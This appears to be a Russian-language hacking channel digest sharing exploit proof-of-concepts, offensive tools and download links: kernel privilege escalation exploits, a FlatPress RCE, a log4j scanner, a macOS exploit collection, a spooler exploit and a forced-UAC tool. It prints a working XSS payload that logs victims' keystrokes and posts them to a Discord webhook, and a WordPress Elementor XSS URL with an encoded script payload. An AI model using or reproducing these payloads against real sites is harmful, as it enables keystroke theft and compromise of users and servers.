Атаки на web-приложения на JAVA
Это обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.
download
*
Bonus track
Jar Analyzer
GUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода.
download

#java #security #web #hack

Cloudmare
Палим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.
Но таки да - работает только если криво настроен DNS.
download

Php Remote file Inclusion and RCE in flatpressblog/flatpress
Proof of Concept

#php #vuln

log4j
ДА, еще один, но попроще
usage:
python3 hik.py https://localhost:443 xxx.oastify.com:80

downLoad

Оценка уязвимостей с помощью Nmap ?
Вам нужен Vultriever !
*
Из коробки Vultriever умеет:

Server IP address
Network port number
Network port status
Protocol used by the network port
Network service operating on the network port and its version
Vulnerability CVE-identifier
Vulnerability rating
URL-link to the denoscription of the vulnerability on the platform Vulners.com

Заказывайте прямо сейчас с уникальной финкой лгбт



Download

CVE-2022-2602 - exploit
Опубликован PoC Kernel Privilege Escalation Linux
*
О чем это, прочитать тут_1 и тут_2
*
POC (точнее два) - забрать
Exploit - забрать

#linux #kernel #exploits

Охота на C2 C&C сервера
Понимание работы и обнаружение фреймворков C2 (C&C)
*
1. Understanding & Detecting C2 Frameworks — TrevorC2
2. Understanding & Detecting C2 Frameworks — Ares
3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)
4. Understanding & Detecting C2 Frameworks — BabyShark
*
BonusTrack:
Download BabyShark

#C2 #hackers #botnets

Linux Kernel RCE (ksmbd)
*
CVSS SCORE: 10 из 10
*
Детали тут
Патч прилетел в ядро только в ветке 5.15.61


#10из10

XSS Payload - Discord Keylogger
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>

#discord #xss

Wordpress - XSS ( CVE-2022-29455)
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==

#wordpress #xss

CVE-2022-42046 Наконец то опубликовали
local privilege escalation
POC download

#windows #lpe #poc

Linux kernel exploit development
*
book

#exploiting #linux

Рубрика - нам пишут
Hey, I've got pretty cool project that you could put on proxybar
*
Shellcodev
это инструмент, предназначенный для помощи в автоматизации создания шелл-кодов.

download

#shellcode

Force Admin
Создаем бесконечные запросы UAC, заставляющие пользователя работать от имени администратора.
Лол, ну то есть админа тупо достали)))) как достать соседа
download

Коллекция Exploits - MacOS
*
CVE-2022-22583
CVE-2022-22616
CVE-2022-22639
CVE-2022-26690
CVE-2022-26712
CVE-2022-26728
CVE-2022-32786
CVE-2022-32800
*
download

#exploit #macOS

Hidden firewall in Linux Kernel
Как дополнительный рубеж безопасности для сервера
*
ReadME
*
DownloadME
*
WatchMe

WebKit+Kernel exploit chain for all PS Vita firmwares

Ну вдруг вам нужно)

download

Kernel Exploits Recipes Notebook
read

#linux #kernel #exploit

Exploiting CVE-2022-42703 - Bringing back the stack attack
Когда протекает память - почитать

#linux #memory #exploit

Выносите святых, опять спулер (стар, но автоматичен)

#windows #spooler #exploit #for_fun